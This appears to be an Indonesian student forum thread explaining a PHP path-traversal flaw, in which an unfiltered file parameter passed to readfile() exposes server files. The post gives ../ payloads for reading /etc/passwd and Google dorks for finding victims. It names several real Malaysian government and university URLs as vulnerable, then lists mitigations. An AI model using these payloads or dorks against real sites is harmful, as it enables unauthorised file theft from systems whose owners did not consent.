ilkom

Forum ilkomers brawijaya...
 
IndeksFAQPencarianAnggotaGroupPendaftaranLogin

Share | 
 

 Seidikit Kelemahan Script PHP

Topik sebelumnya Topik selanjutnya Go down 
PengirimMessage
d0x_xc0d3r

avatar

Jumlah posting : 33
Join date : 06.05.08
Age : 29
Lokasi : Bengkulu - Malang

PostSubyek: Seidikit Kelemahan Script PHP   Tue May 27, 2008 9:52 am

PHP adl bahasa pemrograman web yang kehandalannya tidak diragukan lagi. Tapi adanya kesalahan dalam logika pemrograman php akan bisa berakibat fatal.
yah namanya ga ada gading yg ga retak..

Salah satu contoh:
http://download.php
header( "Content-Type: application/octet-stream" );
header( "Content-Length: " . filesize($_GET['file'] ) );
header( "Content-Disposition: inline; filename=\"$_GET[file]\"");
readfile($_GET['file'] );
?>

Kode diatas memiliki kelemahan yang fatal, variabel “file” sama sekali ga difilter,jdi hacker bs mndownload file apapun yang ada di server tsb. Misal hacker mengakses alamat http://korban/download.php?file=../../../../../../etc/passwd maka file /etc/passwd milik server akan dikirimkan ke hacker.

Atau jika hacker mengakses alamat http://korban/download.php?file=download.php maka hacker akan mendapatkan source code dari file download.php.

Sedangkan untuk mencari korban bisa kita gunakan google, misalkan dengan syntax inurl:”download.php?file=” , atau inurl:”download.php?file=*.pdf” -intext:”download.php?file=*.pdf” atau yang lainnya.

contoh situs yang vulnerable:

http://www.mpbp.gov.my/download.php?file=download.php
http://elearning.mmu.edu.my/download.php?file=download.php
http://www.utem.edu.my/fkp/latihanIndustri/download.php?file=../../../../../../etc/passwd
http://www.moe.gov.my/pipp/download.php?filename=/../../../../../../etc/passwd

kalo mo cegahnya:
1. lakukan pemfilteran terhadap inputan yang diterima dari user.
Misalkan pemfilteran terhadap karakter “../”, “%00”, atau type file yang boleh didownload.
2. lakukan pembatasan file access
3. berikan batasan, file di folder mana saja yang boleh didownload atau tidak
4. untuk menghindari googling, hindari penamaan script dengan nama “download.php” dan nama variabel dengan nama “file”.

jadi hati2 yaa, biar ga ada yang jadi korban... Suspect
Kembali Ke Atas Go down
Lihat profil user http://radoanum.741.com
the_earth

avatar

Jumlah posting : 32
Join date : 22.05.08

PostSubyek: Re: Seidikit Kelemahan Script PHP   Mon Jun 09, 2008 4:54 am

melakukan filternya itu 'mang harus kita sendiri, gw belom pernah nemu bahasa pemrograman yang secara otomatis bisa memfilter suatu variabel, semuanya pasti diseleksi dari user-input (seperti yang @atas bilangin)...

Tapi emang susah ya... udah pernah nyoba? ...
Kembali Ke Atas Go down
Lihat profil user
 
Seidikit Kelemahan Script PHP
Topik sebelumnya Topik selanjutnya Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» Poin-poin kelemahan AJAX
» bikin blog hemat energi!
» bantuin ane dong
» <JUAL> KAWASAKI NINJA 250 R 2009/08
» HONDA GL PRO

Permissions in this forum:Anda tidak dapat menjawab topik
ilkom :: Komputer N' programming :: Internet N' Web programming-
Navigasi: